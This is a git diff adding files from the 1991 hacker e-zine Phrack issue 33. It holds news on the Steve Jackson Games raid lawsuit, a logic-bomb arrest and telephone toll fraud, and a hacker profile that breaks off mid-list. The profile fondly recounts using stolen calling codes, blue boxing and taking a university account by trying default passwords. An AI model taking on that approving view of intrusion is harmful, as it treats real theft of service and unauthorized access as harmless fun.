+     Although neither Jackson nor his company were suspected of any criminal
+activity, the company was rendered a near fatal blow on March 1, 1990, when
+agents of the United States Secret Service, aided by other law enforcement
+officials, raided its office, seizing computer equipment necessary to the
+operation of its publishing business.  The government seized the Illuminati BBS
+and all of the communications stored on it, including private electronic mail,
+shutting down the BBS for over a month.  The Secret Service also seized
+publications protected by the First Amendment, including drafts of the
+about-to-be-released role playing game book GURPS Cyberpunk.  The publication
+of the book was substantially delayed while SJG employees rewrote it from older
+drafts.  This fantasy game book, which one agent preposterously called "a
+handbook for computer crime," has since sold over 16,000 copies and been
+nominated for a prestigious game industry award.  No evidence of criminal
+activity was found.
+
+     The warrant application, which remained sealed at the government's request
+for seven months, reveals that the agents were investigating an employee of the
+company whom they believed to be engaged in activity they found questionable at
+his home and on his own time.  The warrant application further reveals not only
+that the Secret Service had no reason to think any evidence of criminal
+activity would be found at SJG, but also that the government omitted telling
+the Magistrate who issued the warrant that SJG was a publisher and that the
+contemplated raid would cause a prior restraint on constitutionally protected
+speech, publication, and association.
+
+     The defendants in this case are the United States Secret Service and the
+individuals who, by planning and carrying out this grossly illegal search and
+seizure, abused the power conferred upon them by the federal government. Those
+individuals include Assistant United States Attorney William J. Cook, Secret
+Service Agents Timothy M. Foley and Barbara Golden, as well Henry M. Kluepfel
+of Bellcore, who actively participated in the unlawful activities as an agent
+of the federal government.
+
+     These defendants are the same individuals and entities responsible for the
+prosecution last year of electronic publisher Craig Neidorf.  The government in
+that case charged that Neidorf's publication of materials concerning the
+enhanced 911 system constituted interstate transportation of stolen property.
+The prosecution was resolved in Neidorf's favor in July of 1990 when Neidorf
+demonstrated that materials he published were generally available to the
+public.
+
+Legal Significance:
+
+     This case is about the constitutional and statutory rights of publishers
+who conduct their activities in electronic media rather than in the traditional
+print and hard copy media, as well as the rights of individuals and companies
+that use computer technology to communicate as well as to conduct personal and
+business affairs generally.
+
+     The government's wholly unjustified raid on SJG, and seizure of its books,
+magazines, and BBS, violated clearly established statutory and constitutional
+law, including:
+
+o     The Privacy Protection Act of 1980, which generally prohibits the
+      government from searching the offices of publishers for work product and
+      other documents, including materials that are electronically stored;
+
+o     The First Amendment to the U. S. Constitution, which guarantees freedom
+      of speech, of the press and of association, and which prohibits the
+      government from censoring publications, whether in printed or electronic
+      media.
+
+o     The Fourth Amendment, which prohibits unreasonable governmental searches
+      and seizures, including both general searches and searches conducted
+      without probable cause to believe that specific evidence of criminal
+      activity will be found at the location searched.
+
+o     The Electronic Communications Privacy Act and the Federal Wiretap
+      statute, which together prohibit the government from seizing electronic
+      communications without justification and proper authorization.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                        STEVE JACKSON GAMES UPDATE:
+                     THE GOVERNMENT FILES ITS RESPONSE
+
+After several delays, the EFF has at last received the government's response to
+the Steve Jackson Games lawsuit.  Our attorneys are going over these documents
+carefully and we'll have more detailed comment on them soon.
+
+Sharon Beckman, of Silverglate and Good, one of the leading attorneys in the
+case said:
+
+     "In general, this response contains no surprises for us.  Indeed, it
+     confirms that events in this case transpired very much as we thought
+     that they did.  We continue to have a very strong case.  In addition,
+     it becomes clearer as we go forward that the Steve Jackson Games case
+     will be a watershed piece of litigation when it comes to extending
+     constitutional guarantees to this medium."
+_______________________________________________________________________________
+
+Feds Arrest "Logic Bomber"                                         July 1, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Michael Alexander (ComputerWorld)(Page 10)
+
+     SAN DIEGO -- Federal agents arrested a disgruntled programmer last week
+for allegedly planting a logic bomb designed to wipe out programs and data
+related to the U.S. government's billion-dollar Atlas Missile program.
+According to law enforcers, the programmer hoped to be rehired by General
+Dynamics Corporation, his former employer and builder of the missile as a
+high-priced consultant to repair the damage.
+
+     Michael J. Lauffenburger, age 31, who is accused of planting the bomb, was
+arrested after a co-worker accidentally discovered the destructive program on
+April 10, 1991, disarmed it and alerted authorities.  Lauffenburger had
+allegedly programmed the logic bomb to go off at 6 p.m. on May 24, 1991 during
+the Memorial Day holiday weekend and then self-destruct.
+
+     Lauffenburger is charged with unauthorized access of a federal-interest
+computer and attempted computer fraud.  If convicted, he could be imprisoned
+for up to 10 years and fined $500,000.  Lauffenburger pleaded innocent and was
+released on $10,000 bail.
+
+     The indictment said that while Lauffenburger was employed at the General
+Dynamics Space Systems Division plant in San Diego, he was the principle
+architect of a database program known as SAS.DB and PTP, which was used to
+track the availability and cost of parts used in building the Atlas missile.
+
+     On March 20, he created a program called Cleanup that, when executed,
+would have deleted the PTP program, deleted another set of programs used to
+respond to government requests for information, and then deleted itself without
+a trace, according to Mitchell Dembin, the assistant U.S. attorney handling the
+case.
+_______________________________________________________________________________
diff --git a/phrack33/13.txt b/phrack33/13.txt
new file mode 100644
index 0000000..a4e47a7
--- /dev/null
+++ b/phrack33/13.txt
@@ -0,0 +1,378 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 13 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN          Issue XXXIII / Part Three          PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Pentagon Welcomes Hackers!                                    September 9, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From USA Today
+
+     The FBI is investigating an Israeli teen's claim that he broke into a
+Pentagon computer during the gulf war.  An Israeli newspaper Sunday identified
+the hacker as Deri Shraibman, 18.  He was arrested in Jerusalem Friday but
+released without being charged.  Yedhiot Ahronot said Shraibman read secret
+information on the Patriot missle -- used for the first time in the war to
+destroy Iraq's Scud missles in midflight.
+     "Nowhere did it say 'no entry allowed'," Shraibman was quoted as telli
+police.  "It just said 'Welcome.'"  The Pentagon's response:  It takes
+"computer security very seriously," spokesman Air Force Capt. Sam Grizzle said
+Sunday.  Analysts say it isn't the first time military computers have been
+entered.  "No system of safeguards exists ... that is 100% secure," says Alan
+Sabrosky, professor at Rhodes College in Memphis.
+_______________________________________________________________________________
+
+Telesphere Sued By Creditors; Forced Into Bankruptcy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Compiled from Telecom Digest (comp.dcom.telecom)
+
+     On Monday, August 19, Telesphere Communications, Inc. was sued by a group
+of ten creditors who claim the company best known for its 900 service isn't
+paying its bills.  The group of creditors, all information providers using 900
+lines provided through Telesphere claim they are owed two million dollars in
+total for services rendered through their party lines, sports reports,
+horoscopes, sexual conversation lines and other services.  They claim
+Telesphere has not paid them their commissions due for several months.  The
+group of creditors filed in U.S. Bankruptcy Court in Maryland asking that an
+Involuntary Chapter 7 bankruptcy (meaning, liquidation of the company and
+distribution of all assets to creditors) be started against Telesphere.
+
+     The company said it will fight the effort by creditors to force it into
+bankruptcy.  A spokesperson also said the company has already settled with more
+than 50 percent of its information providers who are owed money.  Telesphere
+admitted it had a serious cash flow problem, but said this was due to the large
+number of uncollectible bills the local telephone companies are charging back
+to them.  When end-users of 900 services do not pay the local telco, the telco
+in turn does not pay the 900 carrier -- in this case Telesphere -- and the
+information provider is charged for the call from a reserve each is required to
+maintain.
+
+     But the information providers dispute the extent of the uncollectible
+ charges.  They claim Telesphere has never adequately documented the charges
+placed against them (the information providers) month after month.  In at least
+one instance, an information provider filed suit against an end-user for
+non-payment only to find out through deposition that the user HAD paid his
+local telco, and the local telco HAD in turn paid Telesphere.  The information
+providers allege in their action against the company that Telesphere was in
+fact paid for many items charged to them as uncollectible, "and apparently are
+using the money to finance other aspects of their operation at the expense of
+one segment of their creditors; namely the information providers..."
+Telesphere denied these allegations.
+
+     Formerly based here in the Chicago area (in Oak Brook, IL), Telesphere is
+now based in Rockville, MD.
+______________________________________________________________________________
+
+Theft of Telephone Service From Corporations Is Surging         August 28, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Edmund L. Andrews (New York Times)
+
+     "It is by far the largest segment of communications fraud," said Rami
+Abuhamdeh, an independent consultant and until recently executive director of
+the Communications Fraud Control Association in McLean, Va.  "You have all
+this equipment just waiting to answer your calls, and it is being run by people
+who are not in the business of securing telecommunications."
+
+     Mitsubishi International Corp. reported losing $430,000 last summer,
+mostly from calls to Egypt and Pakistan.  Procter & Gamble Co. lost $300,000 in
+l988.  The New York City Human Resources Administration lost $529,000 in l987.
+And the Secret Service, which investigates such telephone crime, says it is now
+receiving three to four formal complaints every week, and is adding more
+telephone specialists.
+
+     In its only ruling on the issue thus far, the Federal Communications
+Commission decided in May that the long-distance carrier was entitled to
+collect the bill for illegal calls from the company that was victimized.  In
+the closely watched Mitsubishi case filed in June, the company sued AT&T for
+$10 million in the U.S. District Court in Manhattan, arguing that not only had
+it made the equipment through which outsiders entered Mitsubishi's phone
+system, but that AT&T, the maker of the switching equipment, had also been paid
+to maintain the equipment.
+
+     For smaller companies, with fewer resources than Mitsubishi, the problems
+can be financially overwhelming.  For example, WRL Group, a small software
+development company in Arlington, Va., found itself charged for 5,470 calls
+it did not make this spring after it installed a toll-free 800 telephone
+number and a voice mail recording system machine to receive incoming calls.
+Within three weeks, the intruders had run up a bill of $106,776 to US
+Sprint, a United Telecommunications unit.
+
+     In the past, long-distance carriers bore most of the cost, since the
+thefts were attributed to weaknesses in their networks.  But now, the phone
+companies are arguing that the customers should be liable for the cost of
+the calls, because they failed to take proper security precautions on their
+equipment.
+
+     Consumertronics, a mail order company in Alamogordo, N.M., sells brochures
+for $29 that describe the general principles of voice mail hacking and
+the particular weaknesses of different models.  Included in the brochure is a
+list of 800 numbers along with the kind of voice mail systems to which they are
+connected.  "It's for educational purposes," said the company's owner, John
+Williams, adding that he accepts Mastercard and Visa.  Similar insights can be
+obtained from "2600 Magazine", a quarterly publication devoted to telephone
+hacking that is published in Middle Island, N.Y.
+______________________________________________________________________________
+
+Proctor & Gamble                                                August 22, 1991
+~~~~~~~~~~~~~~~~
+Compiled from Telecom Digest
+
+     On 8-12-91, the "Wall Street Journal" published a front page story on an
+investigation by Cincinnati police of phone records following a request by
+Procter & Gamble Co. to determine who might have furnished inside information
+to the "Wall Street Journal".  The information, ostensibly published between
+March 1st and June 10th, 1991, prompted P&G to seek action under Ohio's Trade
+Secrets Law.  In respect to a possible violation of this law, a Grand Jury
+issued a subpoena for records of certain phone calls placed to the Pittsburgh
+offices of the "Wall Street Journal" from the Cincinnati area, and to the
+residence of a "Wall Street Journal" reporter.  By way of context, the
+Pittsburgh offices of the "Wall Street Journal" allegedly were of interest in
+that Journal reporter Alecia Swasy was principally responsible for covering
+Procter & Gamble, and worked out of the Pittsburgh office.
+
+     On 8-13-91, CompuServe subscriber Ryck Bird Lent related the Journal story
+to other members of CompuServe's TELECOM.ISSUES SIG.  He issued the following
+query:
+
+      "Presumably, the records only show that calls were placed between
+       two numbers, there's no content available for inspection.  But
+       what if CB had voice mail services?  And what if the phone number
+       investigations lead to online service gateways (MCI MAil, CIS),
+       are those also subject to subpoena?"
+
+     At the time of Mr. Lent's post, it was known that the "Wall Street
+Journal" had alleged a large amount of phone company records had been provided
+by Cincinnati Bell to local police.  An exact figure did not appear in Lent's
+comments.  Thus, I can't be certain if the Journal published any such specific
+data on 8-12-91 until I see the article in question.
+
+     On 8-14-91, the Journal published further details on the police
+investigation into possible violation of the Ohio Trade Secrets Law.  The
+Journal then asserted that a Grand Jury subpoena was issued and used by the
+Cincinnati Police to order Cincinnati Bell to turn over phone records spanning
+a 15-week period of time, covering 40 million calls placed from the 655 and 257
+prefixes in the 513 area code.  The subpoena was issued, according to the "Wall
+Street Journal", only four working days after a June 10th, 1991 article on
+problems in P&G's food and beverage markets.
+
+     Wednesday [8-14-91], the Associated Press reported that P&G expected no
+charges to be filed under the police investigation into possible violations of
+the Ohio Trade Secrets Law.  P&G spokesperson Terry Loftus was quoted to say:
+"It did not produce any results and is in fact winding down".  Lotus went on to
+explain that the company happened to "conduct an internal investigation which
+turned up nothing.  That was our first step.  After we completed that internal
+investigation, we decided to turn it over to the Cincinnati Police Department".
+
+     Attempts to contact Gary Armstrong, the principal police officer in charge
+of the P&G investigation, by the Associated Press prior to 8-14-91 were
+unsuccessful.  No one else in the Cincinnati Police Department would provide
+comment to AP.
+
+     On 8-15-91, the Associated Press provided a summary of what appeared in
+the 8-14-91 edition of the "Wall Street Journal" on the P&G investigation.  In
+addition to AP's summary of the 8-14-91 Journal article, AP also quoted another
+P&G spokesperson -- Sydney McHugh.  Ms. McHugh more or less repeated Loftus'
+8-13-91 statement with the following comments: "We advised the local Cincinnati
+Police Department of the matter because we thought it was possible that a crime
+had been committed in violation of Ohio law.  They decided to conduct an
+independent investigation."
+
+     Subsequent to the 8-14-91 article in the Journal, AP had once again
+attempted to reach Officer Gary Armstrong with no success.  Prosecutor Arthur
+M. Ney has an unpublished home phone number and was therefore unavailable for
+comment on Wednesday evening [08-14-91], according to AP.
+
+     In the past few weeks, much has appeared in the press concerning
+allegations that P&G, a local grand jury, and/or Cincinnati Police have found a
+"novel" way to circumvent the First Amendment to the U.S. Constitution.  In its
+8-15-91 summary of the 8-14-91 Journal article, AP quoted Cincinnati attorney
+Robert Newman -- specializing in First Amendment issues -- as asserting:
+"There's no reason for the subpoena to be this broad.  It's cause for alarm".
+Newman also offered the notion that:  "P&G doesn't have to intrude in the lives
+of P&G employees, let alone everyone else".
+
+     The same AP story references Cincinnati's American Civil Liberties
+Union Regional Coordinator, Jim Rogers, similarly commenting that: "The
+subpoena is invasive for anyone in the 513 area code.  If I called "The Wall
+Street Journal", what possible interest should P&G have in that?"
+
+     In a later 8-18-91 AP story, Cleveland attorney David Marburger was quoted
+as observing that "what is troublesome is I just wonder if a small business in
+Cincinnati had the same problem, would law enforcement step in and help them
+out?"  Marburger also added, "it's a surprise to me," referring to the nature
+of the police investigation.
+
+     In response, Police Commander of Criminal Investigations, Heydon Thompson,
+told the Cincinnati Business Courier "Procter & Gamble is a newsmaker, but
+that's not the reason we are conducting this investigation."  P&G spokesperson
+Terry Loftus responded to the notion P&G had over-reacted by pointing out: "We
+feel we're doing what we must do, and that's protect the shareholders.  And
+when we believe a crime has been committed, to turn that information over to
+the police."
+
+     Meanwhile, the {Cincinnati Post} published an editorial this past
+weekend -- describing the P&G request for a police investigation as "kind of
+like when the biggest guy in a pick-up basketball game cries foul because
+someone barely touches him."  Finally, AP referenced what it termed "coziness"
+between the city of Cincinnati and P&G in its 8-18-91 piece.  In order to
+support this notion of coziness, Cincinnati Mayor David Mann was quoted to say:
+"The tradition here, on anything in terms of civic or charitable initiative, is
+you get P&G on board and everybody else lines up."  As one who lived near
+Cincinnati for eight years, I recall Procter & Gamble's relationship with
+Cincinnati as rather cozy indeed.
+_______________________________________________________________________________
+
+Hacker Charged in Australia                                     August 13; 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     The Associated Press reports from Melbourne that Nahshon Even-Chaim, a
+20-year old computer science student, is being charged in Melbourne's
+Magistrates' Court on charges of gaining unauthorized access to one of CSIRO's
+(Australia's government research institute) computers, and 47 counts of
+misusing Australia's Telecom phone system for unauthorized access to computers
+at various US institutions, including universities, NASA, Lawrence Livermore
+Labs, and Execucom Systems Corp. of Austin, Texas, where it is alleged he
+destroyed important files, including the only inventory of the company's
+assets.  The prosecution says that the police recorded phone conversations in
+which Even-Chaim described some of his activities.  No plea has been entered
+yet in the ongoing pre-trial proceedings.
+
+_______________________________________________________________________________
+
+Dial-a-Pope Catching on in the U.S.                             August 17, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From the Toronto Star
+
+     The Vatican is reaching out to the world, but it looks as if Canada won't
+be heeding the call.  In the U.S., if you dial a 900 number, you can get a
+daily spiritual pick-me-up from Pope John Paul II.  The multilingual, Vatican
+-authorized service, affectionately known as Dial-a-Pope, is officially titled
+"Christian Messaging From the Vatican."  A spokesman from Bell Canada says
+there is no such number in this country.  But Des Burge, director of
+communications for the Archdiocese of Toronto, says he thinks the service, for
+which U.S. callers pay a fee, is a good way to help people feel more connected
+to the Pope.  (Toronto Star)
+______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~~
+1.  Agent Steal is sitting in a Texas jail awaiting trial for various crimes
+    including credit card fraud and grand theft auto.
+_______________________________________________________________________________
+
+2.  Blue Adept is under investigation for allegedly breaking into several
+    computer systems including Georgia Tech and NASA.
+_______________________________________________________________________________
+
+3.  Control C had his fingerprints, photographs, and a writing sample
+    subpoenaed by a Federal Grandy Jury after Michigan Bell employees,
+    and convicted members of the Legion of Doom (specifically The Leftist
+    and the Urvile) gave testimony.
+
+    Control C was formerly an employee of Michigan Bell in their security
+    department until January 1990, when he was fired about the same time
+    as the raids took place on Knight Lightning, Phiber Optic, and several
+    others.  Control C has not been charged with a crime, but the status
+    of the case remains uncertain.
+_______________________________________________________________________________
+
+4.  Gail Thackeray, a special deputy attorney in Maricopa County in Arizona,
+    has been appointed vice president at Gatekeeper Telecommunications Systems,
+    Inc., a start-up in Dallas.  Thackeray was one of the law enforcers working
+    on Operation Sun-Devil, the much publicized state and federal crackdown on
+    computer crime.  Gatekeeper has developed a device that it claims is a
+    foolproof defense against computer hackers.  Thackeray said her leaving
+    will have little impact on the investigation, but one law enforcer who
+    asked not to be identified, said it is a sure sign the investigation in on
+    the skids. (ComputerWorld, June 24, 1991, page 126)
+_______________________________________________________________________________
+
+5.  Tales Of The Silicon Woodsman -- Larry Welz, the notorious 1960s
+    underground cartoonist, has gone cyberpunk.  He recently devoted an entire
+    issue of his new "Cherry" comice to the adventures of a hacker who gets
+    swallowed by her computer and hacks her way through to the Land of Woz.
+    (ComputerWorld, July 1, 1991, page 82)
+_______________________________________________________________________________
+
+6.  The Free Software Foundation (FSF), founded on the philosophy of free
+    software and unrestricted access to computers has pulled some of its
+    computers off the Internet after malicious hackers <MOD> repeatedly deleted
+    the group's files.  The FSF also closed the open accounts on the system to
+    shut out the hackers who were using the system to ricochet into computers
+    all over the Internet following several complaints from other Internet
+    users.  Richard Stallman, FSF director and noted old-time hacker, refused
+    to go along with his employees -- although he did not overturn the decision
+    -- and without password access has been regulated to using a stand-alone
+    machine without telecom links to the outside world.
+    (ComputerWorld, July 15, 1991, page 82)
+_______________________________________________________________________________
+
+7.  The heads of some Apple Macintosh user groups have received a letter from
+    the FBI seeking their assistance in a child-kidnapping case.  The FBI is
+    querying the user group leaders to see if one of their members fits the
+    description of a woman who is involved in a custody dispute.  It's unclear
+    why the FBI believes the fugitive is a Macintosh user.
+    (ComputerWorld, July 29, 1991, page 90)
+_______________________________________________________________________________
+
+8.  Computer viruses that attack IBM PCs and compatibles are nearing a
+    milestone of sorts.  Within the next few months, the list of viruses will
+    top 1,000 according to Klaus Brunnstein, a noted German computer virus
+    expert.  He has published a list of known malicious software for MS-DOS
+    systems that includes 979 viruses and 19 trojans.  In all, there are 998
+    pieces of "malware," Brunnstein said.
+    (ComputerWorld, July 29, 1991, page 90)
+_______________________________________________________________________________
+
+9.  High Noon on the Electronic Frontier -- This fall the Supreme Court of the
+    United States may rule on the appealed conviction from U.S. v. Robert
+    Tappan Morris.  You might remember that Morris is the ex-Cornell student
+    who accidentially shut down the Internet with a worm program.  Morris is
+    also featured in the book "Cyberpunk" by Katie Hafner and John Markoff.
+_______________________________________________________________________________
+
+10. FBI's Computerized Criminal Histories -- There are still "major gaps in
+    automation and record completness" in FBI and state criminal records
+    systems, the Congressional Office of Technology has reported in a study on
+    "Automated Record Checks of Firearm Purchasers:  Issues and Options."  In
+    the report, OTA estimates that a system for complete and accurate "instant"
+    name checks of state and federal criminal history records when a person
+    buys a firearm would take several years and cost $200-$300 million.  The
+    FBI is still receiving dispositions (conviction, dismissal, not guilty,
+    etc.) on only half of the 17,000 arrest records it enters into its system
+    each day.  Thus, "about half the arrests in the FBI's criminal history
+    files ("Interstate Ident-ification Index" -- or "Triple I") are missing
+    dispositions.  The FBI finds it difficult to get these dispositions."  The
+    OTA said that Virginia has the closest thing to an instant records chck for
+    gun purchasers.  For every 100 purchasers, 94 are approved within 90
+    seconds, but of the six who are disapproved, four or five prove to be based
+    on bad information (a mix-up in names, a felony arrest that did not result
+    in conviction, or a misdemeanor conviction that is not disqualifying for
+    gun ownership) (62 pages, $3 from OTA, Washington, D.C. 20510-8025,
+    202/224-9241, or U.S. Government Printing Office, Stock No.052-003-01247-2,
+    Washington, D.C.  20402-9325, 202/783-3238).
+    (Privacy Journal, August 1991, page 3)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+   Founded in 1974, Privacy Journal is an independent monthly on privacy in the
+   computer age. It reports in legislation, legal trends, new technology, and
+   public attitudes affecting the confidentiality of information and the
+   individual's right to privacy.
+
+   Subscriptions are $98 per year ($125 overseas) and there are special
+   discount rates for students and others.  Telephone and mail orders accepted,
+   credit cards accepted.
+
+                                Privacy Journal
+                                P.O. Box 28577
+                        Providence, Rhode Island  02908
+                                 (401)274-7861
+_______________________________________________________________________________
+
diff --git a/phrack33/2.txt b/phrack33/2.txt
new file mode 100644
index 0000000..3e64a1f
--- /dev/null
+++ b/phrack33/2.txt
@@ -0,0 +1,294 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 2 of 13
+
+                -*[  P H R A C K  XXXIII  P R O P H I L E  ]*-
+
+                          -=>[ by Crimson Death ]<=-
+
+        This issue Phrack Profile features a hacker familiar to most of you.
+His informative files in Phrack and the Legion of Doom Technical Journals
+created a stampede of wanna-be Unix hackers.  Your friend and mine...
+
+                                Shooting Shark
+                                ~~~~~~~~~~~~~~
+
+Personal
+~~~~~~~~
+              Handle:  Shooting Shark
+            Call him:  'Shark'
+        Past handles:  None
+       Handle origin:  It's the title of the 3rd song on "Revolution By Night,"
+                       which many consider to be Blue Oyster Cult's last good
+                       album.
+       Date of Birth:  11/25/66
+ Age at current date:  24
+Approximate Location:  San Francisco Bay Area.
+              Height:  5'10"
+              Weight:  150 lbs.
+           Eye color:  Hazel
+          Hair Color:  Dark Brown
+           Computers:  First: Apple //e. Presently:  ALR Business V EISA
+                                                     386/33.
+------------------------------------------------------------------------------
+
+The Story of my Hacking Career
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     In 1984 I was lucky enough to be a Senior at a high school that had one of
+the pilot "Advanced Placement Computer Science" classes.  I didn't know much
+about computers at the time, but I had a strong interest, so I signed up.
+"Advanced Placement Computer Science" meant programming in Pascal using the
+UCSD P-System on the newly-released Apple //e.  I wasn't too crazy about
+programming in Pascal -- does ANYBODY really like Pascal? -- but I did enjoy
+the software piracy sessions that the class had after school and, much of the
+time, during class when the Instructor was lecturing about DO WHILE loops or
+something equally fascinating.  Some of our favorite games at the time were
+ZORK II and what I still consider to be the best Apple II game ever, RESCUE
+RAIDERS.  A few months into the school year, I somehow convinced my mother to
+buy me my very own Apple //e, with an entire 64K of RAM, a monochrome monitor,
+and a floppy drive.  The first low-cost hard drive for the Apple II, the Sider,
+was $700 for 10Mb at the time, so it was out of the question.
+
+     Now at about this time, Coleco was touting their Adam add-on to the
+ColecoVision game unit, and they had these great guilt-inducing advertisements
+that had copy something like this:
+
+     TEACHER:  "I want to talk to you about Billy.  He's not doing very
+                well in school.  He just doesn't seem to understand new
+                concepts as well as the other kids.  All he does is sit
+                there and pick his nose."
+
+     CONCERNED  "Well, golly, I just don't know what to do.  It's probably
+     FATHER:    probably because his mother drank so much when she was
+                pregnant."
+
+     TEACHER:   "Have you considered getting Billy a computer?"
+
+     And of course the next scene showed little Billy inserting a tape
+cartridge into his new Adam and pecking his way to higher grades.
+
+     Such was not the case with me when I got MY computer.  All I did was go
+home after school and play "Wizardry."  I stopped doing homework and
+I failed 3 out of 6 classes my last semester of my Senior year of high school.
+Luckily enough, I had already been accepted to the local state University, so
+it didn't really matter.  Shortly before graduating, I took the AP Computer
+Science test and got the minimum passing score.  (I didn't feel so bad when Sir
+Francis Drake later told me that he failed it.  Then again, he completed all
+the questions in BASIC.)
+
+     Worse yet, "Wargames" came out around this time.  I'll admit it, my
+interest in hacking was largely influenced by that film.
+
+     Shortly after I (barely) graduated from high school, I saved up my money
+and bought a (get this) Hayes MicroModem //e.  It was only something like $250
+and I was in 300 baud heaven.  I started calling the local "use your real name"
+BBSs and shortly graduated to the various small-time hacker BBSs.  Note that
+90% of the BBSs at this time were running on Apples using Networks, GBBS or
+some other variant.  Few were faster than 300 baud.  It was on one of these
+Apple Networks BBSs that I noticed some users talking about these mysterious
+numbers called "800 extenders."  I innocently inquired as to what these were,
+and got a reply from Elric of Imrryr.  He explained that all I needed to do was
+dial an 800 number, enter a six-digit code, and then I could call anywhere I
+wanted for FREE!  It was the most amazing thing.  So, I picked a handle, and
+began calling systems like Sherwood Forest II and Sherwood Forest III, OSUNY,
+and PloverNet.  At their height, you could call any of these systems and read
+dozens of new messages containing lots of new Sprint and extender codes EVERY
+DAY.  It was great!  I kept pestering my mentor, Elric, and despite his
+undoubted annoyance with my stupid questions, we remained friends.  By this
+time, I realized that my Hayes MicroModem //e was just not where it was at, and
+saved up the $400 to buy a Novation Apple Cat 300, the most awesomest modem of
+its day. This baby had a sound generation chip which could be used to generate
+speech, and more importantly, DTMF and 2600Hz tones.  Stupidly enough, I began
+blue boxing.  Ironically, at this time I was living in the very town that Steve
+Wozniak and Steve Jobs had gotten busted in for boxing ten years previously.
+
+     And THEN I started college.  I probably would have remained a two-bit
+Apple hacker (instead of what I am today, a two-bit IBM hacker) to this day if
+a friend hadn't told me that it was easy to hack into the school's new Pyramid
+90x, a "super mini" that ran a BSD 4.2 variant.  "The professor for the C class
+has created a bunch of accounts, sequentially numbered, all with the same
+default password," he told me.  "Just keep trying them until you get an account
+that hasn't been used by a student yet!"  I snagged an account which I still
+use to this day, seven years later.
+
+     At about this time, I called The Matrix, run by Dr. Strangelove. This was
+my first experience with Ken's FORUM-PC BBS software.  Dr. Strangelove was a
+great guy, even though he looks somewhat like a wood mouse (and I mean that in
+the nicest possible way).  DSL helped me build my first XT clone for a total
+cost of about $400.  He even GAVE me a lot of the components I needed, like a
+CGA card and a keyboard.
+
+     Shortly after that, The Matrix went down and was quickly replaced by IDI,
+run by Aiken Drum.  It is here that I met Sir Francis Drake.  Shortly after
+THAT, IDI went down and was quickly replaced by Lunatic Labs Unltd, run by my
+old friend The Mad Alchemist.  TMA lived within walking distance of my house,
+so I called LunaLabs quite a bit.  LunaLabs later became the home base of
+Phrack for a few issues when Knight Lightning and Taran King gave it upon
+entering their freshman year of college.
+
+     So during this time I just got really into Unix and started writing files
+for Phrack.  I wrote about six articles for Phrack and then one for the 2nd LOD
+Technical Journal, which featured a brute-force password hacker.  I know, that
+sounds archaic, but this was back in 1984, and I was actually one of the few
+people in the hacker community that knew quite a bit about Unix.  I've been
+told by several people that it was my LOD TJ article that got *them* into Unix
+hacking (shucks).  I also wrote the original Unix Nasties article for Phrack,
+and on two occasions, when I was later heavily into massive Internet node
+hopping, I would get into a virgin system at some backwoods college like MIT
+and find *my file* in somebody's directory.
+
+     During 1987, I got a letter from the local FBI office.  It was addressed
+to my real name and asked for any information I might wish to provide on a
+break-in in San Diego.  Of course I declined, but they kept sending me more
+letters.  Now that I was 18 years old I decided to stop doing illegal things.
+I know..."what a weenie."  So Lunatic Labs, now being run by The Mad Alchemist,
+became my exclusive haunt because it was a local board.  When Elric and Sir
+Francis Drake took over the editorship of Phrack for a few issues, I wrote all
+their intro files.
+
+     When my computer broke I let those days just fade away behind me.
+Occasionally, old associates would manage to find me and call me voice, much to
+my surprise.  Somebody called me once and told me an account had been created
+for me on a BBS called "Catch 22," a system that must have been too good to
+last.  I think I called it twice before it went down.  Most recently, Crimson
+Death called me, asked me to write a Profile, and here we are.
+
+What I'm Doing Now
+~~~~~~~~~~~~~~~~~~
+     After two years in the Computer Science program in college, I switched my
+major to Theater Arts for three reasons:
+
+     1) Theater Arts people were generally nicer people;
+     2) Most CS students were just too geeky for me (note I said "most"); and,
+     3) I just couldn't manage to pass Calculus III!
+
+I graduated last year with a BA in Theater Arts, and like all newly graduated
+Theater majors, started practicing my lines, such as "Do you want fries with
+that?" and "Can I tell you about today's special?"  However, I managed to have
+the amazing luck of getting a job in upper management at one of the west
+coast's most famous IBM video graphics card manufacturers.  My position lets me
+play with a lot of different toys like AutoDesk 3D Studio and 24-bit frame
+buffers.  A 24-bit image I created was featured on the cover of the November
+1990 issue of Presentation Products magazine.  For a while I was the system
+administrator of the company's Unix system, with an IP address and netnews and
+the whole works.  Now I'm running the company's two-line BBS -- if you can
+figure out what company I work for, give it a call and leave me some mail
+sometime.  I'm also into MIDI, and I've set my mother up with a nice little
+studio including a Tascam Porta One and a Roland MT-32.  I was an extra in the
+films "Patty Hearst" (with The $muggler) and "The Doors" (for which I put in a
+22-hour day at the Warfield Theater in San Francisco for a concert scene that
+WAS CUT FROM THE #*%& FILM) and I look forward to working on more films in a
+capacity that does not require me to wear bell-bottoms.  I've also acted in
+local college theater and I'll be directing a full-length production at a local
+community theater next year.  I like to consider myself a well-rounded person.
+
+     Oh yeah.  I also got married last October.
+
+People I Have Known
+~~~~~~~~~~~~~~~~~~~
+Elric of Imrryr -- My true mentor.  He got me into the business.  Too bad he
+                   moved to Los Angeles.
+
+Shadow 2600 -- Known to some as David Flory, may he rest in peace.  Early
+               in my career he mentioned me and listed me as a collaborator for
+               a 2600 article.  That was the first time I saw my name in print.
+
+Oryan QUEST -- After I had my first Phrack article published, he started
+               calling me (he lived about 20 miles away at the time).  He would
+               just call me and give me c0deZ like he was trying to impress me
